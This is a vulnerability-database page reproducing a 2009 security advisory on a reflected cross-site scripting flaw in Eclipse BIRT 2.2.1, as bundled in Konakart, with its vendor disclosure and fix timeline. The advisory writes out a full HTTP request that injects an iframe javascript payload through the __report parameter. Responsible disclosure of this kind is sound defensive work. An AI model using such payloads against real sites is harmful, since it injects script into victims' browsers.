Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Eclipse BIRT 2.2.1 Cross Site Scripting

🗓️ 15 Oct 2009 00:00:00Reported by euronymousType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 30 Views

Eclipse BIRT 2.2.1 Reflected Cross Site Scripting vulnerability in org.eclipse.birt.core_2.2.1.r22x_v2007092

Code
`Eclipse BIRT <= 2.2.1 Reflected XSS  
  
Vendor: Eclipse  
Advisory: http://antisnatchor.com/2008/12/18/eclipse-birt-reflected-xss/  
Author: Michele "euronymous" Orrù (euronymous AT antisnatchor DOT com)  
  
Quite a common problem in a lot of Java based applications: reflected  
XSS in Java stack trace.  
  
A Reflected XSS is present in the _report parameter: here below the modified  
request (that is the BIRT 2.2.1 version included in Konakart 2.2.6)  
  
GET  
/birt-viewer/run?__report='"><iframe%20src=javascript:alert(666)>&r=-703171660  
HTTP/1.1  
Host: localhost:8780  
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.18)  
Gecko/20081029 Firefox/2.0.0.18  
Accept:  
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5  
Accept-Language: en-us,en;q=0.5  
Accept-Encoding: gzip,deflate  
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7  
Keep-Alive: 300  
Proxy-Connection: keep-alive  
Referer: http://localhost:8780/konakartadmin/  
  
  
Konakart is actually using org.eclipse.birt.core_2.2.1.r22x_v20070924, that is  
actually old.  
  
- Disclosure timeline:  
2008-12-17 11:04:15 EST : Vendor Contacted  
2009-02-11 03:39:09 EST: Bug fix  
2009-03-09 05:32:42 EDT: Patches verified on 2.5.0  
  
- CREDITS  
  
Michele "euronymous" Orru'  
  
- LEGAL NOTICES  
  
Copyright (c) 2009 Michele "euronymous" Orru'  
  
Permission is granted for the redistribution of this alert  
electronically. It may not be edited in any way without mine express  
written consent. If you wish to reprint the whole or any  
part of this alert in any other medium other than electronically,  
please email me for permission.  
  
Disclaimer: The information in the advisory is believed to be accurate  
at the time of publishing based on currently available information. Use  
of the information constitutes acceptance for use in an AS IS condition.  
There are no warranties with regard to this information. Neither the  
author nor the publisher accepts any liability for any direct, indirect,  
or consequential loss or damage arising from use of, or reliance on,  
this information.  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
15 Oct 2009 00:00Current
7.4High risk
Vulners AI Score7.4
eclipse birtreflected xssjava stack tracekonakartsecurity advisoryvendor contactedpatches verifiedmichele orru
30